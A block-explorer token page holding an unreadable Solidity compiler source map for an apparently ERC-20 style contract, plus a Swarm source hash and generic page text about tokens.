4083:10555:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6812:88;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8559:152;;;;;;:::i;:::-;;:::i;:::-;;;1085:14:1;;1078:22;1060:41;;1048:2;1033:18;8559:152:0;920:187:1;5938:91:0;6009:12;;5938:91;;;1258:25:1;;;1246:2;1231:18;5938:91:0;1112:177:1;9296:287:0;;;;;;:::i;:::-;;:::i;6037:83::-;;;6111:1;1815:36:1;;1803:2;1788:18;6037:83:0;1673:184:1;7414:169:0;;;;;;:::i;:::-;;:::i;:::-;;4344:25;;;;;;:::i;:::-;;:::i;:::-;;;-1:-1:-1;;;;;2609:32:1;;;2591:51;;2579:2;2564:18;4344:25:0;2445:203:1;6580:109:0;;;;;;:::i;:::-;-1:-1:-1;;;;;6664:17:0;6637:7;6664:17;;;:8;:17;;;;;;;6580:109;1722:103;;;:::i;6317:100::-;;;:::i;:::-;;;;;;;:::i;994:87::-;1040:7;1067:6;-1:-1:-1;;;;;1067:6:0;994:87;;5195:93;;;:::i;14237:398::-;;;;;;:::i;:::-;;:::i;7798:144::-;;;;;;:::i;:::-;;:::i;12947:571::-;;;;;;:::i;:::-;;:::i;7953:134::-;;;;;;:::i;:::-;;:::i;6424:148::-;;;;;;:::i;:::-;;:::i;6812:88::-;6849:13;6882:10;6875:17;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6812:88;:::o;8559:152::-;8625:4;8642:39;832:10;8665:7;8674:6;8642:8;:39::i;:::-;-1:-1:-1;8699:4:0;8559:152;;;;;:::o;9296:287::-;9419:4;832:10;9477:38;9493:4;832:10;9508:6;9477:15;:38::i;:::-;9526:27;9536:4;9542:2;9546:6;9526:9;:27::i;:::-;-1:-1:-1;9571:4:0;;9296:287;-1:-1:-1;;;;9296:287:0:o;7414:169::-;7481:2;;-1:-1:-1;;;;;7481:2:0;832:10;7481:18;7478:61;;7515:12;;-1:-1:-1;;;7515:12:0;;;;;;;:::i;:::-;;;;;;;;7478:61;-1:-1:-1;;;;;7552:7:0;;;;;;;;:1;:7;;;;;:23;;-1:-1:-1;;7552:23:0;;;;;;;;;;7414:169::o;4344:25::-;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;4344:25:0;;-1:-1:-1;4344:25:0;:::o;1722:103::-;713:13;:11;:13::i;:::-;1787:30:::1;1814:1;1787:18;:30::i;:::-;1722:103::o:0;6317:100::-;6365:16;6401:8;6394:15;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;6394:15:0;;;;;;;;;;;;;;;;;;;;;;6317:100;:::o;5195:93::-;5235:13;5268:12;5261:19;;;;;:::i;14237:398::-;14330:4;832:10;14330:4;14413:25;832:10;14430:7;14413:9;:25::i;:::-;14386:52;;14477:15;14457:16;:35;;14449:85;;;;-1:-1:-1;;;14449:85:0;;4668:2:1;14449:85:0;;;4650:21:1;4707:2;4687:18;;;4680:30;4746:34;4726:18;;;4719:62;-1:-1:-1;;;4797:18:1;;;4790:35;4842:19;;14449:85:0;4466:401:1;14449:85:0;14545:60;14554:5;14561:7;14570:34;14589:15;14570:16;:34;:::i;:::-;14545:8;:60::i;7798:144::-;7860:4;7877:35;832:10;7901:2;7905:6;7877:9;:35::i;12947:571::-;13117:5;;13084:6;;13068:13;;13117:11;;13084:6;;13117:11;:::i;:::-;13194:12;;13253:2;;13101:27;;-1:-1:-1;832:10:0;;;;-1:-1:-1;;;;;13253:2:0;:18;;13250:257;;13287:12;;-1:-1:-1;;;13287:12:0;;;;;;;:::i;13250:257::-;13333:2;;-1:-1:-1;;;;;13333:2:0;832:10;13333:18;13330:69;;13371:12;;-1:-1:-1;;;13371:12:0;;;;;;;:::i;13330:69::-;-1:-1:-1;;;;;13409:15:0;;;;;;:8;:15;;;;;:24;;13428:5;;13409:15;:24;;13428:5;;13409:24;:::i;:::-;;;;-1:-1:-1;13445:14:0;;-1:-1:-1;13454:5:0;13445:14;;:::i;:::-;13471:12;:20;-1:-1:-1;;;;;;12947:571:0:o;7953:134::-;-1:-1:-1;;;;;8052:18:0;;;8025:7;8052:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;7953:134::o;6424:148::-;6489:2;;-1:-1:-1;;;;;6489:2:0;6495:10;6489:16;6485:53;;6518:12;;-1:-1:-1;;;6518:12:0;;;;;;;:::i;6485:53::-;-1:-1:-1;;;;;6548:7:0;;;;;;;;:1;:7;;;;;:20;;-1:-1:-1;;6548:20:0;;;;;;;;;;6424:148::o;11102:378::-;-1:-1:-1;;;;;11238:19:0;;11230:68;;;;-1:-1:-1;;;11230:68:0;;5642:2:1;11230:68:0;;;5624:21:1;5681:2;5661:18;;;5654:30;5720:34;5700:18;;;5693:62;-1:-1:-1;;;5771:18:1;;;5764:34;5815:19;;11230:68:0;5440:400:1;11230:68:0;-1:-1:-1;;;;;11317:21:0;;11309:68;;;;-1:-1:-1;;;11309:68:0;;6047:2:1;11309:68:0;;;6029:21:1;6086:2;6066:18;;;6059:30;6125:34;6105:18;;;6098:62;-1:-1:-1;;;6176:18:1;;;6169:32;6218:19;;11309:68:0;5845:398:1;11309:68:0;-1:-1:-1;;;;;11388:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;11440:32;;1258:25:1;;;11440:32:0;;1231:18:1;11440:32:0;;;;;;;11102:378;;;:::o;11772:409::-;11907:24;11934:25;11944:5;11951:7;11934:9;:25::i;:::-;11907:52;;-1:-1:-1;;11974:16:0;:37;11970:204;;12056:6;12036:16;:26;;12028:68;;;;-1:-1:-1;;;12028:68:0;;6450:2:1;12028:68:0;;;6432:21:1;6489:2;6469:18;;;6462:30;6528:31;6508:18;;;6501:59;6577:18;;12028:68:0;6248:353:1;12028:68:0;12111:51;12120:5;12127:7;12136:25;12155:6;12136:16;:25;:::i;12111:51::-;11896:285;11772:409;;;:::o;10003:668::-;-1:-1:-1;;;;;10137:14:0;;;10114:21;10137:14;;;:8;:14;;;;;;;;;10176:5;;;;;:1;:5;;;;;;;;:18;;;;-1:-1:-1;10192:2:0;;-1:-1:-1;;;;;10185:9:0;;;10192:2;;10185:9;;10176:18;10175:40;;10202:13;10175:40;;;10198:1;10175:40;10159:56;-1:-1:-1;;;;;;10231:18:0;;10223:68;;;;-1:-1:-1;;;10223:68:0;;6808:2:1;10223:68:0;;;6790:21:1;6847:2;6827:18;;;6820:30;6886:34;6866:18;;;6859:62;-1:-1:-1;;;6937:18:1;;;6930:35;6982:19;;10223:68:0;6606:401:1;10223:68:0;-1:-1:-1;;;;;10307:16:0;;10299:64;;;;-1:-1:-1;;;10299:64:0;;7214:2:1;10299:64:0;;;7196:21:1;7253:2;7233:18;;;7226:30;7292:34;7272:18;;;7265:62;-1:-1:-1;;;7343:18:1;;;7336:33;7386:19;;10299:64:0;7012:399:1;10299:64:0;-1:-1:-1;;;;;10387:7:0;;;;;;:1;:7;;;;;;;;:27;;10401:13;10387:27;;;10397:1;10387:27;10371:43;;10447:6;10430:13;:23;;10422:74;;;;-1:-1:-1;;;10422:74:0;;7618:2:1;10422:74:0;;;7600:21:1;7657:2;7637:18;;;7630:30;7696:34;7676:18;;;7669:62;-1:-1:-1;;;7747:18:1;;;7740:36;7793:19;;10422:74:0;7416:402:1;10422:74:0;-1:-1:-1;;;;;10521:14:0;;;;;;:8;:14;;;;;;:21;;10536:6;;10521:21;:::i;:::-;-1:-1:-1;;;;;10504:14:0;;;;;;;:8;:14;;;;;;:38;;;;10565:12;;;;;;;:19;;10578:6;;10565:19;:::i;:::-;-1:-1:-1;;;;;10550:12:0;;;;;;;:8;:12;;;;;;;:34;;;;10603:26;;;;;;;;;;10622:6;1258:25:1;;1246:2;1231:18;;1112:177;10603:26:0;;;;;;;;10638:19;10654:2;10638:15;:19::i;1434:132::-;1040:7;1067:6;-1:-1:-1;;;;;1067:6:0;832:10;1498:23;1490:68;;;;-1:-1:-1;;;1490:68:0;;8025:2:1;1490:68:0;;;8007:21:1;;;8044:18;;;8037:30;8103:34;8083:18;;;8076:62;8155:18;;1490:68:0;7823:356:1;1987:191:0;2061:16;2080:6;;-1:-1:-1;;;;;2097:17:0;;;-1:-1:-1;;;;;;2097:17:0;;;;;;2130:40;;2080:6;;;;;;;2130:40;;2061:16;2130:40;2050:128;1987:191;:::o;6126:183::-;-1:-1:-1;;;;;6194:17:0;;;;;;:7;:17;;;;;;;;6189:113;;-1:-1:-1;;;;;6228:17:0;;;;;;:7;:17;;;;;:24;;-1:-1:-1;;6228:24:0;6248:4;6228:24;;;;;;6267:8;:23;;;;;;;;;;;;;;-1:-1:-1;;;;;;6267:23:0;;;;;;6189:113;6126:183;:::o;14:418:1:-;163:2;152:9;145:21;126:4;195:6;189:13;238:6;233:2;222:9;218:18;211:34;297:6;292:2;284:6;280:15;275:2;264:9;260:18;254:50;353:1;348:2;339:6;328:9;324:22;320:31;313:42;423:2;416;412:7;407:2;399:6;395:15;391:29;380:9;376:45;372:54;364:62;;;14:418;;;;:::o;437:173::-;505:20;;-1:-1:-1;;;;;554:31:1;;544:42;;534:70;;600:1;597;590:12;534:70;437:173;;;:::o;615:300::-;683:6;691;744:2;732:9;723:7;719:23;715:32;712:52;;;760:1;757;750:12;712:52;783:29;802:9;783:29;:::i;:::-;773:39;881:2;866:18;;;;853:32;;-1:-1:-1;;;615:300:1:o;1294:374::-;1371:6;1379;1387;1440:2;1428:9;1419:7;1415:23;1411:32;1408:52;;;1456:1;1453;1446:12;1408:52;1479:29;1498:9;1479:29;:::i;:::-;1469:39;;1527:38;1561:2;1550:9;1546:18;1527:38;:::i;:::-;1294:374;;1517:48;;-1:-1:-1;;;1634:2:1;1619:18;;;;1606:32;;1294:374::o;1862:347::-;1927:6;1935;1988:2;1976:9;1967:7;1963:23;1959:32;1956:52;;;2004:1;2001;1994:12;1956:52;2027:29;2046:9;2027:29;:::i;:::-;2017:39;;2106:2;2095:9;2091:18;2078:32;2153:5;2146:13;2139:21;2132:5;2129:32;2119:60;;2175:1;2172;2165:12;2119:60;2198:5;2188:15;;;1862:347;;;;;:::o;2214:226::-;2273:6;2326:2;2314:9;2305:7;2301:23;2297:32;2294:52;;;2342:1;2339;2332:12;2294:52;-1:-1:-1;2387:23:1;;2214:226;-1:-1:-1;2214:226:1:o;2653:186::-;2712:6;2765:2;2753:9;2744:7;2740:23;2736:32;2733:52;;;2781:1;2778;2771:12;2733:52;2804:29;2823:9;2804:29;:::i;:::-;2794:39;2653:186;-1:-1:-1;;;2653:186:1:o;2844:637::-;3034:2;3046:21;;;3116:13;;3019:18;;;3138:22;;;2986:4;;3217:15;;;3191:2;3176:18;;;2986:4;3260:195;3274:6;3271:1;3268:13;3260:195;;;3339:13;;-1:-1:-1;;;;;3335:39:1;3323:52;;3404:2;3430:15;;;;3395:12;;;;3371:1;3289:9;3260:195;;;-1:-1:-1;3472:3:1;;2844:637;-1:-1:-1;;;;;2844:637:1:o;3486:260::-;3554:6;3562;3615:2;3603:9;3594:7;3590:23;3586:32;3583:52;;;3631:1;3628;3621:12;3583:52;3654:29;3673:9;3654:29;:::i;:::-;3644:39;;3702:38;3736:2;3725:9;3721:18;3702:38;:::i;:::-;3692:48;;3486:260;;;;;:::o;3751:380::-;3830:1;3826:12;;;;3873;;;3894:61;;3948:4;3940:6;3936:17;3926:27;;3894:61;4001:2;3993:6;3990:14;3970:18;3967:38;3964:161;;4047:10;4042:3;4038:20;4035:1;4028:31;4082:4;4079:1;4072:15;4110:4;4107:1;4100:15;3964:161;;3751:380;;;:::o;4136:325::-;4338:2;4320:21;;;4377:1;4357:18;;;4350:29;-1:-1:-1;;;4410:2:1;4395:18;;4388:32;4452:2;4437:18;;4136:325::o;4872:127::-;4933:10;4928:3;4924:20;4921:1;4914:31;4964:4;4961:1;4954:15;4988:4;4985:1;4978:15;5004:128;5071:9;;;5092:11;;;5089:37;;;5106:18;;:::i;5137:168::-;5210:9;;;5241;;5258:15;;;5252:22;;5238:37;5228:71;;5279:18;;:::i;5310:125::-;5375:9;;;5396:10;;;5393:36;;;5409:18;;:::i
Swarm Source
ipfs://720726337abf9325f59e9b2c0c3f204382863e0f034b3faf2b1a4ac1b35fc6da
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.